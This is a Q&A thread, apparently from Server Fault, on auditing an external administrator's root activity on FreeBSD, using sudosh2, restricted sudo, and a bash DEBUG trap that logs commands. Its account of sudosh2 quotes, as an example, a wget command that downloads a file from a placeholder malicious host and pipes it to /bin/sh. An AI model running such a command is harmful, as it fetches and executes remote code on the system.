Log every command executed from root

security freebsd

I want to give access to my root server to an external system administrator, but i want to be sure to double check what he is doing to my server, e.g. copying data i don't want them to do and so on. I would also like to take a track of whatever file is accessed, even in read only and not edited.

How can i do that?


Solution 1:

Trust, but verify!

Check out sudosh2. sudosh2 is provided by FreeBSD ports. Packages are available for RedHat and Ubuntu. Here is the description from their website:

sudosh is an auditing shell filter and can be used as a login shell. Sudosh records all keystrokes and output and can play back the session as just like a VCR.

Sudosh will allow you to replay the user's session, which will allow you to see all input and output as the user saw it. You see everything, keystrokes, typos, backspaces, what did they edit in vi, the output of wget -O- http://zyxzyxzyxzyx.ru/haxor/malware | /bin/sh, etc.

It's possible to send sudosh logs to syslog, so that they can be stored on a central syslog server away from the system.

Note that sudosh2 is a replacement for sudosh, which was abandoned by it's author

Do you work at an academic institution where users insist on having superuser privledges? Or do you work at a corporation and want to allow users to have superuser privileges on their own VMs? This might be the solution for you.

Solution 2:

Don't give him root access. Instead, give him an un-privileged user account and request that he do all of his work through sudo, which will log all of his commands.

Keep in mind that if this person has ill intentions and you give him full sudo privileges, he will find a way to carry out those ill intentions without those commands being logged. In this case, only grant him access to the specific commands he needs to do his job.

Solution 3:

I'm not familiar with sudosh2, but I put the following in my .bashrc to log all the commands I type in a bash shell to the file ~/.command_log:

# log every command typed and when
if [ -n "${BASH_VERSION}" ]; then
    trap "caller >/dev/null || \
printf '%s\\n' \"\$(date '+%Y-%m-%dT%H:%M:%S%z')\
 \$(tty) \${BASH_COMMAND}\" 2>/dev/null >>~/.command_log" DEBUG
fi

The above sets a trap on DEBUG, which is executed just before an ordinary command is executed. The caller built-in is used to test whether the command is being typed at an interactive shell or run via something like .bashrc. The value ${BASH_COMMAND} contains the command currently being executed.

Related

Linux distributions recommendations for servers [closed]
kswapd often uses 100% CPU when swap is in use
Setting up an anonymous Windows Server 2008 network share?
Why does chmod(1) on the group affect the ACL mask?
How do I find (or exclude) all directories and sub-directories matching a certain pattern (in Linux)?
How can I display the IP address of an interface?
Non-ECC memory with ZFS: a stupid idea?
Unable to Share Data between Amazon EC2 Instances for Windows
How can I add one disk to an existing raidz zpool?
Continuously monitor logs with tail that are occasionally rotated
Using CA certificate for Remote Desktop Connection
How does IPMI sideband share the ethernet port with the host?